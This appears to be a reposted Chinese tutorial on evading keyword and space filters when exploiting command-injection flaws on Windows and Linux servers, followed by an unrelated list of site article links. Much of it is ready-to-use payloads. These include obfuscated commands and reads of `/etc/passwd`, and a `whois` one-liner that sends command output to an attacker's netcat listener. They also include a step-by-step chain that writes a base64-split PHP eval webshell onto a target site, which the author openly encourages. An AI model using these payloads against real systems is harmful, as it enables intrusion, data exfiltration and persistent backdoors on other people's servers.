简谈命令执行漏洞绕过过滤
原文:
https://mp.weixin.qq.com/s?__biz=MzUyODkwNDIyMg==&mid=2247503891&idx=1&sn=791096c5cb77ec15da4b0c6816215665&chksm=fa6ba962cd1c2074d9d2e6b3eab992b1012a8ac48317c04bfcb5b167544c79b80faa2879d05b&mpshare=1&scene=23&srcid=08158g7b5aMS9hNz88pImYUL&sharer_sharetime=1628961613808&sharer_shareid=8208acd0a14afc94c2c6da0f5d488644#rd
前言
今天和各位一起发散一下思维,聊聊关于命令执行漏洞绕过过滤的方法,让我们一起由浅入深。
一、windows下
1.1 符号与命令的关系
在看一个例子开始之前,首先了解一点,"
和^
这还有成对的圆括号()
符号并不会影响命令的执行。
在windows环境下,命令可以不区分大小写
whoami //正常执行w"h"o"a"m"i //正常执行w"h"o"a"m"i" //正常执行wh""o^a^mi //正常执行wh""o^am"i //正常执行((((Wh^o^am""i))))//正常执行
当然你可以加无数个"
但不能同时连续加2个^
符号,因为^
号是cmd中的转义符,跟在他后面的符号会被转义
w"""""""""""""hoami //正常执行w"""""""""""""hoa^m""i //正常执行w"""""""""""""hoa^^m""i //执行错误
如果在命令执行的时候遇到了拦截命令的关键字,那么就可以使用这种方式绕过啦。
1.2 了解set命令和windows变量
我们再了解一下cmd中的set命令和%符号的含义
首先set命令可以用来设置一个变量(环境变量也是变量哦~),那么%符号如下图
set a=1//设置变量a,值为1echo a //此时输出结果为"a"echo %a%//此时输出结果为"1"
可以明显的看出,用两个%括起来的变量,会引用其变量内的值。
那也就是说:
set a=whoami //设置变量a的值为whoami%a%//引用变量a的值,直接执行了whoami命令
这样就可以执行命令了,又或者还可以
set a=whoset b=ami%a%%b%//正常执行whoamiset a=w""hoset b=a^mi%a%%b%//根据前一知识点进行组合,正常执行whoamiset a=ser&&set b=ne&&set c=t u && call %b%%c%%a%//在变量中设置空格,最后调用变量来执行命令
通常我们也可以自定义一个或者多个环境变量,利用环境变量值中的字符,提取并拼接出最终想要的cmd命令。
如:
Cmd /C "set envar=net user && call echo %envar%"
可以拼接出cmd命令:net user
也可以定义多个环境变量进行拼接命令串,提高静态分析的复杂度:
cmd /c "set envar1=ser&& set envar2=ne&& set envar3=t u&&call echo %envar2%%envar3%%envar1%"
cmd命令的“/C”参数,Cmd /C “string”
表示:执行字符串string指定的命令,然后终止。
而启用延迟的环境变量扩展,经常使用 cmd.exe的 /V:ON
参数,
/V:ON参数启用时
,可以不使用call命令来扩展变量,使用 %var% 或 !var! 来扩展变量,
!var!
可以用来代替%var%
,也就是可以使用感叹号字符来替代运行时的环境变量值。
后面介绍For循环
时会需要开启/V:
参数延迟变量扩展方式。
1.3 windows进阶,切割字符串!
再进阶一下,命令行有没有类似php或者python之类的语言中的截取字符串的用法呢,当然也是有的。
还拿刚才的whoami来举例
%a:~0%//取出a的值中的所有字符此时正常执行whoami%a:~0,6%//取出a的值,从第0个位置开始,取6个值此时因为whoami总共就6个字符,所以取出后正常执行whoami%a:~0,5%//取5个值,whoam无此命令%a:~0,4%//取4个值,whoa无此命令
从上图可以看出,截取字符串的语法就是
%变量名:~x,y%
即对变量从第x个元素开始提取,总共取y个字符。
当然也可以写-x,-y,从后往前取
写作-x
,可取从后往前数第x位的字符开始,一直到字符的末尾
-y
来决定少取几个字符
继续操作
首先set看一下目前有哪些变量可以给我们用呢
第一个a=whoami可以暂时先忽略,是我自己设置的。
我自己电脑上的环境变量还是挺多的,那我几乎可以用这种方式执行任何命令,因为这些变量的值,几乎都有26个字母在了
从简单的开始,如果命令执行不允许空格,被过滤,那么可以
net%CommonProgramFiles:~10,1%user
CommonProgramFiles=C:\Program Files\Common Files
从CommonProgramFiles这个变量中截取,从第10个字符开始,截取后面一个字符,那这个空格就被截取到了(也就是Program和Files中间的那个空格)
net user正常执行,当然了,还可以配合符号一起使用
n^et%CommonProgramFiles:~10,1%us^er
再列出C盘根目录
d^i^r%CommonProgramFiles:~10,1%%commonprogramfiles:~0,3%//~10,1对应空格,~0,3对应"C:\"
那假如环境变量里没有我们需要的字符怎么办呢,那就自己设置呗
set TJ=a bcde/$@\";fgphvlrequst?//比如上面这段组合成一个php一句话不难吧?
看到这里,聪明的你应该已经学会如何使用这种方式来给网站目录里写个webshell了吧。
1.4 逻辑运算符在绕过中的作用
继续往下,相信所有人都知道,|在cmd中,可以连接命令,且只会执行后面那条命令
whoami | ping www.baidu.comping www.baidu.com | wh""oam^i//两条命令都只会执行后面的
而||符号的情况下,只有前面的命令失败,才会执行后面的语句
ping 127.0.0.1|| whoami //不执行whoamiping xxx.|| whoami //执行whoami
而&符号,前面的命令可以成功也可以失败,都会执行后面的命令,
其实也可以说是只要有一条命令能执行就可以了,但whoami放在前面基本都会被检测
ping 127.0.0.1& whoami //执行whoamiping xxx.& whoami //执行whoami
而&&符号就必须两条命令都为真才可以了
ping www.baidu.com -n 1&& whoami //执行whoamiping www && whoami //不执行whoami
1.5利用For循环拼接命令
For循环经常被用来混淆处理cmd命令,使得cmd命令看起来复杂且难以检测。
最常用的For循环参数有 /L,/F参数。
FOR 参数 %变量名 IN (相关文件或命令) DO 执行的命令
for /L %variable in (start,step,end) do command [command-parameters]
该命令表示以增量形式从开始到结束的一个数字序列。
使用迭代变量设置起始值(start).
然后逐步执行一组范围的值,直到该值超过所设置的终止值 (end)。
/L 将通过对start与end进行比较来执行迭代变量。
如果start小于end,就会执行该命令,否则命令解释程序退出此循环。
还可以使用负的 step以递减数值的方式逐步执行此范围内的值。
例如,(1,1,5) 生成序列 1 2 3 4 5,
而 (5,-1,1) 则生成序列 (5 4 3 2 1)。
命令cmd /C "for /L %i in (1,1,5) do start cmd"
会执行打开5个cmd窗口。
/F参数:是最强大的命令,用来处理文件和一些命令的输出结果。
FOR /F ["options"]%variable IN (file-set) DO command [command-parameters]FOR /F ["options"]%variable IN ("string") DO command [command-parameters]FOR /F ["options"]%variable IN ('command') DO command [command-parameters]
(file-set) 为文件名,for会依次将file-set中的文件打开,并且在进行到下一个文件之前将每个文件读取到内存,按照每一行分成一个一个的元素,忽略空白行。
(“string”)代表字符串,(‘command’)代表命令。
假如文件aa.txt中有如下内容:
第1行第1列 第1行第2列
第2行第1列 第2行第2列
要想读出aa.txt中的内容,可以用for /F %i in (aa.txt) do echo %i
如果去掉/F参数则只会输出aa.txt,并不会读取其中的内容。
先从括号执行,因为含有参数/F,所以for会先打开aa.txt
然后读出aa.txt里面的所有内容,把它作为一个集合,并且以每一行作为一个元素。
由上图可见,并没有输出第二列的内容.
原因是如果没有指定"delims=符号列表"
这个开关
那么for /F语句会默认以空格键或Tab键作为分隔符。
For /F是以行为单位来处理文本文件的,如果我们想把每一行再分解成更小的内容,就使用delims和tokens选项。
delims用来告诉for每一行用什么作为分隔符,默认分隔符是空格和Tab键。
for /F "delims= " %i in (aa.txt) do echo %i
将delims设置为空格,是将每个元素以空格分割,默认只取分割之后的第一个元素。
如果我们想得到第二列数据,就要用到tokens=2,来指定通过delims将每一行分成更小的元素时,要取出哪一个或哪几个元素:
for /F "tokens=2 delims= " %i in (aa.txt) do echo %i
二、进入linux
2.1 linux下的符号和逻辑运算符
这个时候有好奇的观众朋友就要问了,那对方服务器是linux的话怎么办呢?
道理也是相同的
a=whob=ami$a$b
只不过windows的cmd下取变量值需要用两个%,linux下需要用$
那么我们又可以怎么组合呢,接着来看
Linux下用分号表示命令结束后执行后面的命令,无论前面的命令是否成功
ping www.; whoamiecho tj ; whoami
符号|在linux中,可以连接命令,和win一样,也只会执行后面那条命令
其他符号如|| 、& 、&&和windows都是一样,不再过多赘述
那么让我们根据以上两点进行一个结合
t=l; j=s; i=" -al"; $t$j$i
2.2 利用未被过滤的命令,一个例子!
看图好了
自己服务器中:nc -lvvp 端口payload发送给对方:whois -h ip -p 端口`命令`//``为反引号//下图以自身服务器的1234端口作演示,实际情况根据个人更改
使用whois来执行命令和传输文件
在实际的攻击场景中,可以在自己的攻击服务器上用nc监听一个公网端口,然后在存在命令执行漏洞的网站中发送payload请求,
对它使用whois命令使其命令执行结果返回给nc监听的端口,从而在自己服务器中查看
2.3 linux进阶,符号之间的组合
继续说回来,刚才我说了,windows下双引号和幂运算符号都不会影响命令的执行,linux也同理,如下图
wh\oamiwh$1oamiwho$@amiwhoa$*mi
在绕过时,不管是windows还是linux,都可以自写fuzz脚本来进行测试
在linux中?扮演的角色是匹配任意一个字符,用?来绕过限制
which whoami //找到whoami路径/u?r/?in/wh?am?which ifconfig //找到ifconfig/us?/sbin/if?onfig
同理可得,星号*在linux中用来代表一个或多个任何字符,包括空字符
/*/bin/wh*mi/us*/*in/who*mi
组合起来!
/*s?/*?n/w?o*i
2.4 linux深入,命令中的命令
Linux中,反引号的作用是把括起来的字符当做命令执行
666`whoami`666666`\whoami`666//命令执行后的结果在2个666中间
至于第二条命令为什么加个\上面已经解释过了
我们再次组合起来
w`\saldkj2190`ho`\12wsa2`am`\foj11`iwh$(70shuai)oa$(fengfeng)mi
2.5 利用linux中的环境变量
linux是否能像windows那样,使用环境变量里的字符执行变量呢,当然也是可以的。
我就喜欢把一个命令写的好长,让别人看不懂,这样就感觉很厉害的样子
首先echo $PATH
Linux下严格区分大小写,不可以写成$path,但windows可以,细心的小伙伴可能发现前面windows下我写过CommonProgramFiles,也写过commonprogramfiles
接着我们来截取字符串,我懒得数
echo ${#PATH}
长度为145-1=144
如果我现在要查看/root/目录下的123.txt文件,就可以像下图一样操作
cat ${PATH:136:6}123.txt
那么相信让你拼接成想要的命令都不难吧,至于怎么设置变量然后去引用,不过多赘述,
道理都是相同的,我找字符找的眼睛快瞎了
${PATH:91:1}h${PATH:139:1}a${PATH:103:1}${PATH:143:1}
2.6 使用大括号绕过空格过滤
在linux下我们还可以使用大花括号来绕过空格的限制,比如ls -alt命令中间的空格
{ls,-alt}
再比如cat /etc/passwd命令中间的空格
{cat,/etc/passwd}
2.7 了解重定向符号在绕过中的作用
我们还可以使用<>来绕过空格。请仔细看执行后的效果。
linux中,小于号<表示的是输入重定向,就是把<后面跟的文件取代键盘作为新的输入设备,而>大于号是输出重定向,比如一条命令,默认是将结果输出到屏幕。
但可以用>来将输出重定向,用后面的文件来取代屏幕,将输出保存进文件里
ls<>alt
2.8 linux中特殊的base64编码
我们还可以在自己的linux系统中将命令进行base64编码
然后再拿去目标请求中命令执行,使用base64的-d参数解码。
echo whoami|base64 //先输出whoami的base64编码`echo dwhvYW1pCg==|base64 -d`//将其base64解码
再次强调用反引号括起来的值会被当做命令执行
三、一个有趣的例子
咱们再根据base64进行一次发散思维。
如果某处存在命令执行但是限制了长度,我们可以利用这种方式来写一个密码为123的webshell一句话木马。
echo "<?php @eval($_POST[123]);?>"| base64//输出一句话的base64编码
echo -n PD>a;echo -n 9w>b;echo -n aH>c;echo -n Ag>d;echo -n QG>e;echo -n V2>f;echo -n YW>g;echo -n wo>h;echo -n JF>i;echo -n 9Q>j;echo -n T1>k;echo -n NU>l;echo -n Wz>m;echo -n Ey>n;echo -n M1>o;echo -n 0p>p;echo -n Oz>q;echo -n 8+>r;
然后组合base64解码并生成php文件
cat a b>s;cat s c>b;cat b d>s;cat s e>a;cat a f>s;cat s g>a;cat a h>s;cat s i>a;cat a j>s;cat s k>a;cat a l>s;cat s m>a;cat a n>s;cat s o>a;cat a p>s;cat s q>a;cat a r>s;
base64 -d s>z;cp z tj.php;
大体思路就是用echo不断写入或者也可以用>>来追加写入,拼接成一个文件,最后cp或者mv成一个文件
echo -n是令其后面不会加入自动换行,方便拼接。
逐步解释要写很多,建议有点懵的哥哥一句一句执行,然后依次查看结果
那在写shell的时候命令被过滤了怎么办呢,那就回到刚才的办法中尝试绕过啦
总结
在实际绕过中,可以用多种方式来组合测试进行绕过,可以看出本篇多次使用各种组合来执行命令,主要是希望哥哥们多去尝试,发散思维
参考
以Emotet为例深入分析CMD命令混淆技术(http://x5c.net/bcirw)
模糊命令行检测(http://x5c.net/bcir8)
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
相关文章
- 最快的排序-基数排序
package 杂包;import java.text.SimpleDateFormat; import java.util.Arrays; import java.util.Date;public class RadixSort {public static void main(String[] args) {int arr[] { 53, 3, 542, 748, 14, 214};// 80000000 * 11 * 4 / 1024 / 1024 / 1024 3.3G // int[] …...
2024/4/20 23:26:08 - 当独家版权成为历史,音乐行业进入新起点,歌曲走红具有哪些特点
音乐是一种没有国界的东西,它很神奇,只要有一段旋律,就算语言不通,人们也可以享受其中的快乐。当独家版权成为历史,音乐行业才算真正进入新的起点上,音乐平台才能开启良性竞争,更好地服务用户&a…...
2024/4/17 21:14:40 - 模糊度固定原理
上图方程中包含N模糊度这一未知数,若仅由方程组解算N得到的是浮点解{N1 N2 … Ni}.并且这些解之间的相关性很强,我们在进行模糊度固定之前要做的第一步是进行一个Z变换,这一过程可以使模糊度的相关性减弱。 具体过程目前还没搞清,…...
2024/4/27 1:19:40 - 学习java和html必须要知道的英文单词
以前听说学习编程不需要记太多的英语单词,但是我在学习的时候还是碰到许多重要的编程单词, 加端端老师免费领取更多Java资料 java入门基础学习单词 第一篇 1.public [pʌblɪk] 公开 2.static [sttɪk] 静态 3.void [vɔɪd] 无返回 4.main [meɪn] 主要…...
2024/4/27 5:27:43 - Latex学习过程中常见问题记录
Latex学习过程中常见问题记录 在学习Latex的使用过程中常常遇到的问题记录下来,方便后续使用过程中翻阅,也便于自己学习整理。 目录Latex学习过程中常见问题记录问题1:怎么修改文字的颜色问题2:怎么修改文字字体的大小问题3&#…...
2024/4/17 6:33:16 - CentOS7 如何注册系统服务
文章目录1. 创建 service 文件2. 重载 service 文件3. 启动与查看以 mysql 为例,演示 centos7 如何注册系统服务 1. 创建 service 文件 cat > /usr/lib/systemd/system/mysql.service <<EOF [Unit] DescriptionMySQL Community Server Afternetwork.targ…...
2024/4/15 4:22:28 - 1、回顾大学四年,后悔没有这样做
今天咱们来聊聊当初自己选择的这个计算机专业,那现在的你后悔了嘛? 至少我是“不”,我时常感叹啊,要不是当初自己选择了计算机科学与技术专业,我也许过不上现在这样喜欢的生活,如果当初选择了车辆工程&…...
2024/4/25 19:14:03 - C语言程序设计(专科)复习题
《C语言程序设计》 一、选择题: 1.以下不是C语言的特点的是( ) A.C语言简洁、紧凑 B.能够编制出功能复杂的程序 C. C语言可以直接对硬件进行操作 D.C语言移植性好 2. 以下不正确的C语言标识符是( )。 A&…...
2024/4/15 4:22:18 - SpringBoot框架入门核心知识点
SpringBoot是由Pivotal团队提供的全新框架,其设计目的是用来简化新Spring应用的初始搭建以及开发过程。 该框架使用了特定的方式来进行配置,从而使开发人员不再需要定义样板化的配置。 通过这种方式,SpringBoot致力于在蓬勃发展的快速应用开…...
2024/4/20 18:58:29 - 浏览器/计算机网络前端面试题目汇总
前端面试高频题目 一 、HTTP(计网)http和https的区别ssL原理webscokecthttp请求过程http 请求头的概念请求方法(get、post区别)状态码TCP的三次握手、四次挥手二 、浏览器1、页面性能优化如何加快首屏速度2、浏览器兼容3、浏览器渲…...
2024/4/26 17:15:44 - 时代赋机遇,双十一电商盛会神助攻——中科柏诚
在电商行业迅猛发展的当下,一年一度的双十一,成为最大规模的消费购物盛会。双十一期间,成千上万的买家与卖家,共同构筑成一个共赢获利的消费蛋糕,不论是消费者、商家、电商平台还是银行,都摩拳擦掌…...
2024/4/26 10:48:26 - 百度编辑器 图片粘贴上传,实现图文粘贴,图片自动上传
由于工作需要必须将word文档内容粘贴到编辑器中使用 但发现word中的图片粘贴后变成了file:///xxxx.jpg这种内容,如果上传到服务器后其他人也访问不了,网上找了很多编辑器发现没有一个能直接解决这个问题 考虑到自己除了工作其他时间基本上不使用window…...
2024/4/15 4:22:23 - 求两个有序数组的第k大的数
题目:给定两个一维int数组A和B. 其中:A是长度为m、元素从小到大排好序的有序数组。B是长度为n、元素从小到大排好序的有序数组。希望从A和B数组中,找出最大的k个数字,要求:使用尽量少的比较次数。 解法: …...
2024/4/15 4:22:43 - C语言程序设计2007年试卷
C语言程序设计2007年试卷 一、单项选择题:(10分,每题2分) 1.char (*p)[5];该语句声明p是一个 。 A) 指向含有5个元素的一维字符型数组的指针变量p B) 指向长度不超过5的字符串的指针变量p C) 有5个元素的…...
2024/4/26 14:36:27 - 人工智能助力全国大学生智能车竞赛
01 内容简介■ 分享主题 人工智能助力全国大学生智能车智能车竞赛 ■ 内容简介 全国大学智能车竞赛是由教育部于2006年开始委托高校自动化大类教学指导委员会举办的面向全国大学生的一种探索性工程实践活动。是教育部倡导的大学生科技竞赛之一。竞赛至今已经连续举办了16届&…...
2024/4/18 7:30:11 - Python GUI之tkinter 写了一个精简版的百度翻译小工具
先上图 再上代码 # -*- encoding: utf-8 -*- """ File : test.py Modify Time Version Description ------------ -------- ----------- 2021/11/02 2:11 下午 1.0 None """# import lib# !/u…...
2024/4/19 17:31:35 - 数据库的事务学习
文章目录事务四大特征多事务并发存在的问题事务隔离级别查询数据库的隔离级别设置数据库隔离级别1.事务里面的语句出错时并不会主动回滚,需要用户主动执行回滚指令 2.事务开始后,如果没有主动执行回滚或者提交指令,事务始终在执行中 3.事务执…...
2024/4/25 20:58:21 - 概率论笔记:高斯分布的边缘概率
1 符号说明 将变量、均值和方差进行划分(xa是m维的,xb是n维的): 其中x满足N(μ,Σ),μ,Σ满足: 边缘概率就是需要求解P(xa)和P(xb) 2 需要用到的定理 2.1 定理的说明 这个证明不严谨…...
2024/4/19 10:08:35 - 产品经理经典书单
近日天气变冷,周末宅家,适合看书,给大家推荐几本好书。 虽然,我们现在看视频和直播也能获取知识点,但依然要相信,一本书所涵盖的知识点之全面,以及一本书从写稿、到审核、修订等等一系列标准下来…...
2024/4/25 3:07:22 - SpringMVC获得请求数据
文章目录1. 获得请求参数2. 获得基本类型参数3. 获得POJO类型参数4. 获得数组类型参数5. 获得集合类型参数6. 请求数据乱码问题7. 参数绑定注解 requestParam8. 获得Restful风格的参数9. 自定义类型转换器10. 获得Servlet相关API11. 获得请求头11.1 RequestHeader11.2 CookieVa…...
2024/4/15 22:33:06
最新文章
- 【C++】1 两数之和
给定一个整数数组 nums 和一个整数目标值 target,请你在该数组中找出 和为目标值 target 的那 两个 整数,并返回它们的数组下标。 你可以假设每种输入只会对应一个答案。但是,数组中同一个元素在答案里不能重复出现。 你可以按任意顺序返回…...
2024/4/27 5:45:18 - 梯度消失和梯度爆炸的一些处理方法
在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言,在此感激不尽。 权重和梯度的更新公式如下: w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...
2024/3/20 10:50:27 - vue3项目运行正常但vscode红色波浪线报错
以下解决办法如不生效,可尝试 重启 vscode 一、Vetur插件检测问题 vetur 是一个 vscode 插件,用于为 .vue 单文件组件提供代码高亮以及语法支持。但 vue 以及 vetur 对于 ts 的支持,并不友好。 1、原因 如下图:鼠标放到红色波浪…...
2024/4/26 17:21:41 - FreeRTOS学习 -- 再识
工作中一直使用FreeRTOS进行着开发,但是没有进行过系统的总结过。现在将快速使用几天时间将FreeRTOS相关知识点加以总结。 官网: https://www.freertos.org/zh-cn-cmn-s/ 参看资料: 正点原子 STM32F1 FreeRTOS开发手册_V1.2.pdf The FreeRTOS…...
2024/4/23 6:24:52 - 【外汇早评】美通胀数据走低,美元调整
原标题:【外汇早评】美通胀数据走低,美元调整昨日美国方面公布了新一期的核心PCE物价指数数据,同比增长1.6%,低于前值和预期值的1.7%,距离美联储的通胀目标2%继续走低,通胀压力较低,且此前美国一季度GDP初值中的消费部分下滑明显,因此市场对美联储后续更可能降息的政策…...
2024/4/26 18:09:39 - 【原油贵金属周评】原油多头拥挤,价格调整
原标题:【原油贵金属周评】原油多头拥挤,价格调整本周国际劳动节,我们喜迎四天假期,但是整个金融市场确实流动性充沛,大事频发,各个商品波动剧烈。美国方面,在本周四凌晨公布5月份的利率决议和新闻发布会,维持联邦基金利率在2.25%-2.50%不变,符合市场预期。同时美联储…...
2024/4/26 20:12:18 - 【外汇周评】靓丽非农不及疲软通胀影响
原标题:【外汇周评】靓丽非农不及疲软通胀影响在刚结束的周五,美国方面公布了新一期的非农就业数据,大幅好于前值和预期,新增就业重新回到20万以上。具体数据: 美国4月非农就业人口变动 26.3万人,预期 19万人,前值 19.6万人。 美国4月失业率 3.6%,预期 3.8%,前值 3…...
2024/4/26 23:05:52 - 【原油贵金属早评】库存继续增加,油价收跌
原标题:【原油贵金属早评】库存继续增加,油价收跌周三清晨公布美国当周API原油库存数据,上周原油库存增加281万桶至4.692亿桶,增幅超过预期的74.4万桶。且有消息人士称,沙特阿美据悉将于6月向亚洲炼油厂额外出售更多原油,印度炼油商预计将每日获得至多20万桶的额外原油供…...
2024/4/27 4:00:35 - 【外汇早评】日本央行会议纪要不改日元强势
原标题:【外汇早评】日本央行会议纪要不改日元强势近两日日元大幅走强与近期市场风险情绪上升,避险资金回流日元有关,也与前一段时间的美日贸易谈判给日本缓冲期,日本方面对汇率问题也避免继续贬值有关。虽然今日早间日本央行公布的利率会议纪要仍然是支持宽松政策,但这符…...
2024/4/25 18:39:22 - 【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响
原标题:【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响近日伊朗局势升温,导致市场担忧影响原油供给,油价试图反弹。此时OPEC表态稳定市场。据消息人士透露,沙特6月石油出口料将低于700万桶/日,沙特已经收到石油消费国提出的6月份扩大出口的“适度要求”,沙特将满…...
2024/4/25 18:39:22 - 【外汇早评】美欲与伊朗重谈协议
原标题:【外汇早评】美欲与伊朗重谈协议美国对伊朗的制裁遭到伊朗的抗议,昨日伊朗方面提出将部分退出伊核协议。而此行为又遭到欧洲方面对伊朗的谴责和警告,伊朗外长昨日回应称,欧洲国家履行它们的义务,伊核协议就能保证存续。据传闻伊朗的导弹已经对准了以色列和美国的航…...
2024/4/26 21:56:58 - 【原油贵金属早评】波动率飙升,市场情绪动荡
原标题:【原油贵金属早评】波动率飙升,市场情绪动荡因中美贸易谈判不安情绪影响,金融市场各资产品种出现明显的波动。随着美国与中方开启第十一轮谈判之际,美国按照既定计划向中国2000亿商品征收25%的关税,市场情绪有所平复,已经开始接受这一事实。虽然波动率-恐慌指数VI…...
2024/4/25 16:48:44 - 【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试
原标题:【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试美国和伊朗的局势继续升温,市场风险情绪上升,避险黄金有向上突破阻力的迹象。原油方面稍显平稳,近期美国和OPEC加大供给及市场需求回落的影响,伊朗局势并未推升油价走强。近期中美贸易谈判摩擦再度升级,美国对中…...
2024/4/26 16:00:35 - 【原油贵金属早评】市场情绪继续恶化,黄金上破
原标题:【原油贵金属早评】市场情绪继续恶化,黄金上破周初中国针对于美国加征关税的进行的反制措施引发市场情绪的大幅波动,人民币汇率出现大幅的贬值动能,金融市场受到非常明显的冲击。尤其是波动率起来之后,对于股市的表现尤其不安。隔夜美国股市出现明显的下行走势,这…...
2024/4/25 18:39:16 - 【外汇早评】美伊僵持,风险情绪继续升温
原标题:【外汇早评】美伊僵持,风险情绪继续升温昨日沙特两艘油轮再次发生爆炸事件,导致波斯湾局势进一步恶化,市场担忧美伊可能会出现摩擦生火,避险品种获得支撑,黄金和日元大幅走强。美指受中美贸易问题影响而在低位震荡。继5月12日,四艘商船在阿联酋领海附近的阿曼湾、…...
2024/4/25 18:39:16 - 【原油贵金属早评】贸易冲突导致需求低迷,油价弱势
原标题:【原油贵金属早评】贸易冲突导致需求低迷,油价弱势近日虽然伊朗局势升温,中东地区几起油船被袭击事件影响,但油价并未走高,而是出于调整结构中。由于市场预期局势失控的可能性较低,而中美贸易问题导致的全球经济衰退风险更大,需求会持续低迷,因此油价调整压力较…...
2024/4/26 19:03:37 - 氧生福地 玩美北湖(上)——为时光守候两千年
原标题:氧生福地 玩美北湖(上)——为时光守候两千年一次说走就走的旅行,只有一张高铁票的距离~ 所以,湖南郴州,我来了~ 从广州南站出发,一个半小时就到达郴州西站了。在动车上,同时改票的南风兄和我居然被分到了一个车厢,所以一路非常愉快地聊了过来。 挺好,最起…...
2024/4/26 22:01:59 - 氧生福地 玩美北湖(中)——永春梯田里的美与鲜
原标题:氧生福地 玩美北湖(中)——永春梯田里的美与鲜一觉醒来,因为大家太爱“美”照,在柳毅山庄去寻找龙女而错过了早餐时间。近十点,向导坏坏还是带着饥肠辘辘的我们去吃郴州最富有盛名的“鱼头粉”。说这是“十二分推荐”,到郴州必吃的美食之一。 哇塞!那个味美香甜…...
2024/4/25 18:39:14 - 氧生福地 玩美北湖(下)——奔跑吧骚年!
原标题:氧生福地 玩美北湖(下)——奔跑吧骚年!让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 啊……啊……啊 两…...
2024/4/26 23:04:58 - 扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!
原标题:扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!扒开伪装医用面膜,翻六倍价格宰客!当行业里的某一品项火爆了,就会有很多商家蹭热度,装逼忽悠,最近火爆朋友圈的医用面膜,被沾上了污点,到底怎么回事呢? “比普通面膜安全、效果好!痘痘、痘印、敏感肌都能用…...
2024/4/25 2:10:52 - 「发现」铁皮石斛仙草之神奇功效用于医用面膜
原标题:「发现」铁皮石斛仙草之神奇功效用于医用面膜丽彦妆铁皮石斛医用面膜|石斛多糖无菌修护补水贴19大优势: 1、铁皮石斛:自唐宋以来,一直被列为皇室贡品,铁皮石斛生于海拔1600米的悬崖峭壁之上,繁殖力差,产量极低,所以古代仅供皇室、贵族享用 2、铁皮石斛自古民间…...
2024/4/25 18:39:00 - 丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者
原标题:丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者【公司简介】 广州华彬企业隶属香港华彬集团有限公司,专注美业21年,其旗下品牌: 「圣茵美」私密荷尔蒙抗衰,产后修复 「圣仪轩」私密荷尔蒙抗衰,产后修复 「花茵莳」私密荷尔蒙抗衰,产后修复 「丽彦妆」专注医学护…...
2024/4/26 19:46:12 - 广州械字号面膜生产厂家OEM/ODM4项须知!
原标题:广州械字号面膜生产厂家OEM/ODM4项须知!广州械字号面膜生产厂家OEM/ODM流程及注意事项解读: 械字号医用面膜,其实在我国并没有严格的定义,通常我们说的医美面膜指的应该是一种「医用敷料」,也就是说,医用面膜其实算作「医疗器械」的一种,又称「医用冷敷贴」。 …...
2024/4/25 18:38:58 - 械字号医用眼膜缓解用眼过度到底有无作用?
原标题:械字号医用眼膜缓解用眼过度到底有无作用?医用眼膜/械字号眼膜/医用冷敷眼贴 凝胶层为亲水高分子材料,含70%以上的水分。体表皮肤温度传导到本产品的凝胶层,热量被凝胶内水分子吸收,通过水分的蒸发带走大量的热量,可迅速地降低体表皮肤局部温度,减轻局部皮肤的灼…...
2024/4/25 18:38:57 - 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...
解析如下:1、长按电脑电源键直至关机,然后再按一次电源健重启电脑,按F8健进入安全模式2、安全模式下进入Windows系统桌面后,按住“winR”打开运行窗口,输入“services.msc”打开服务设置3、在服务界面,选中…...
2022/11/19 21:17:18 - 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。
%读入6幅图像(每一幅图像的大小是564*564) f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...
2022/11/19 21:17:16 - 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...
win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面,在等待界面中我们需要等待操作结束才能关机,虽然这比较麻烦,但是对系统进行配置和升级…...
2022/11/19 21:17:15 - 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...
有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows,请勿关闭计算机”的提示,要过很久才能进入系统,有的用户甚至几个小时也无法进入,下面就教大家这个问题的解决方法。第一种方法:我们首先在左下角的“开始…...
2022/11/19 21:17:14 - win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...
置信有很多用户都跟小编一样遇到过这样的问题,电脑时发现开机屏幕显现“正在配置Windows Update,请勿关机”(如下图所示),而且还需求等大约5分钟才干进入系统。这是怎样回事呢?一切都是正常操作的,为什么开时机呈现“正…...
2022/11/19 21:17:13 - 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...
Win7系统开机启动时总是出现“配置Windows请勿关机”的提示,没过几秒后电脑自动重启,每次开机都这样无法进入系统,此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一:开机按下F8,在出现的Windows高级启动选…...
2022/11/19 21:17:12 - 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...
有不少windows10系统用户反映说碰到这样一个情况,就是电脑提示正在准备windows请勿关闭计算机,碰到这样的问题该怎么解决呢,现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法:1、2、依次…...
